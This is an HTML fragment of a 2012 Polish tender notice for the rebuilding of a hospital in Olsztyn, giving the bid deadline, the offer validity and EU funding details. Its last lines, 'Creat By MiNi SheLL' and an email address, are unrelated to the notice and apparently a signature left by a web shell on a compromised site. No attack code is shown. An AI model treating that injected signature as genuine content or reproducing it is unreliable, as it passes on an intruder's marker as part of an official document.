<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.12.2012 godzina 10:00, miejsce: Miejski Szpital Zespolony w Olsztynie, ul. Niepodległości 44, bud. Administracji, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt nr WND-RPWM.03.02.01-28-004/09 Przebudowa, rozbudowa i modernizacja Miejskiego Szpitala Zespolonego w Olsztynie jako placówki o zasięgu regionalnym, z budową pawilonu i bloku operacyjnego w ramach Osi Priorytetowej 3 - Infrastruktura społeczna. Działania 3.2. - Wysoki poziom zabezpieczenia i dostępności medycznej i opiekuńczej. Poddziałania 3.2.1 - Infrastruktura ochrony zdrowia Regionalnego Programu Operacyjnego Warmia i Mazury na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com